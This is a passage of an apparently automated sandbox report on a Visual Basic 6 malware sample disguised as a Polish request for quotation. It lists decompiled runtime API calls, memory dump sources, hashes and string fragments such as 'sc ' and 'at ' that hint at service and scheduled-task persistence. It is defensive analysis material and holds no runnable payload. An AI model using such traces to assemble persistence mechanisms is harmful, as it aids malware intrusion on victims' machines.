                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                                                                                                                                                                                        • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                                                                                                                                                                                      • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040CB52
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040CB7A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CB85
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(00000000), ref: 0040CB94
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(80000002,00000000,00000000,80000002,00000000,00000000), ref: 0040CBE5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CBF9
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC06
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC16
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC2E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CC42
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC4F
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC5F
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC77
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CC8B
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CC98
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCA8
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CCC0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CCD4
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                                                                                                                                                                                        • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(6D076537,00000000,00000000), ref: 00425A0A
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                                                                                                                                                                                        • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CCE1
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCF1
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CD09
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD1B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CD26
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CD3B
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040CD42
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CD4D
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CD5A
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CD72
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CD8A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD9C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CDA7
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CDBC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0040CDC3
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CDCE
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CDDB
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CDF3
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(at.,00000000), ref: 0040CE0F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CE1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040CE28
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0040CE33
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CE40
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE50
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CE68
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0040CE7C
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0040CE89
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE99
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CEB3,0042C160), ref: 00411F1E
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00411F4E
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(0040CEB3,?,?,?,00000000,004032B6), ref: 00411F69
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F7D
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00411F86
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F97
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?,004156AF), ref: 0041565A
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415667
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415674
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415681
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041568D
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 00415696
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 0041569F
                                                                                                                                                                                                                                                        • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 004156A8
                                                                                                                                                                                                                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEE1
                                                                                                                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040CF27
                                                                                                                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0040CF42
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0040CFB1), ref: 0040CFA1
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0040CFAA
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaErase.MSVBVM60(004065BC,0042C078,0000000A,-00000061,6CF8DF85), ref: 00411B74
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaRedim.MSVBVM60(00000000,00000024,0042C078,004065BC,00000001,00000003,00000001), ref: 00411B97
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411BAA
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaGenerateBoundsError.MSVBVM60 ref: 00411BCE
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411BFE
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?), ref: 00411C14
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411C1A
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411C2C
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaAryUnlock.MSVBVM60(?), ref: 00411C3E
                                                                                                                                                                                                                                                        • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411C4F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Free$Move$Copy$List$Error$Bstr$ChkstkUnlock$#516#580#631AnsiFileSystemUnicode$#525#570#648LockOpen$#529#537#600#616BoundsCheckDestructEraseGenerateGet3Get4HresultRedimSeek
                                                                                                                                                                                                                                                      • String ID: MR$ RO$Once$at.$system\
                                                                                                                                                                                                                                                      • API String ID: 2909355650-3550570743
                                                                                                                                                                                                                                                      • Opcode ID: 1a787a17832883457bb363a360e8e57ce220131458789b833322a31e1582a5d4
                                                                                                                                                                                                                                                      • Instruction ID: 5352e845ad87aaf5050473855ece2fd4f397f64d24d7448873b9de5ca92ad3b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a787a17832883457bb363a360e8e57ce220131458789b833322a31e1582a5d4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0F14F71A00248EFDB04EFA0EE89AEE7775EF48304F108169F606B72A1DB745A45CF59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041EB3E
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(00000001,?,?,?,00000000,Function_000032B6), ref: 0041EB6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000005,00000000,00000002,?,?), ref: 0041EBB0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000040,00004000), ref: 0041EBE8
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,FFFFFFFF,?,00004000), ref: 0041EC19
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000020), ref: 0041ECA0
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                                                                                                                                                                                        • Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 0041ECBB
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00408114,?), ref: 0041ECD1
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00409A70,?), ref: 0041ECF1
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041ECFC
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000), ref: 0041ED03
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041ED1E
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041ED43
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041ED4E
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041ED5C
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0041ED7B
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041ED8A
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041ED96
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,sc ), ref: 0041EDAC
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EDB7
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EDC5
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0041EDE4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041EDF3
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041EDFF
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                                                                                                                                                                                        • Part of subcall function 0041A980: __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000014,00000000), ref: 0041EE2B
                                                                                                                                                                                                                                                      • #598.MSVBVM60 ref: 0041EE38
                                                                                                                                                                                                                                                      • #611.MSVBVM60(00000000), ref: 0041EE47
                                                                                                                                                                                                                                                      • #661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0041EE77
                                                                                                                                                                                                                                                      • #705.MSVBVM60(?,00000004), ref: 0041EE86
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EE94
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,at ), ref: 0041EEB9
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EEC4
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(004086A8,00000000), ref: 0041EED0
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EEDB
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000000), ref: 0041EEEB
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041EEF2
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EEFD
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF0A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF15
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60("\\,00000000), ref: 0041EF21
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF2C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF3A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF45
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF51
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF5C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF6A
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF78
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF84
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EF92
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF9F
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EFAD
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(004095E4,00000000), ref: 0041EFB9
                                                                                                                                                                                                                                                      • #600.MSVBVM60(00000008,00000000), ref: 0041EFD8
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F022
                                                                                                                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041F042
                                                                                                                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF), ref: 0041F076
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F099
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?), ref: 0041F0AF
                                                                                                                                                                                                                                                      • __vbaExitProc.MSVBVM60 ref: 0041F0B5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041F135), ref: 0041F12E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Ansi$#600Chkstk$#537List$#525#598#606#611#616#661#705Construct2CopyExitProcUnicode
                                                                                                                                                                                                                                                      • String ID: "\\$at $sc
                                                                                                                                                                                                                                                      • API String ID: 318166071-2414866108
                                                                                                                                                                                                                                                      • Opcode ID: 4b8c8b84d047fe4784aaf450267804eaefad0624f37f806294de8aa0bbb905cd
                                                                                                                                                                                                                                                      • Instruction ID: eba9ca47820d788d97438d3d91098e027868d298501ab0f7648888b7b33149ee
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b8c8b84d047fe4784aaf450267804eaefad0624f37f806294de8aa0bbb905cd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01F12E71900248EFDB14DFA0DE49BDEBBB4FB48305F1081AAE506B72A0DB745A89CF54
                                                                                                                                                                                                                                                      APIs
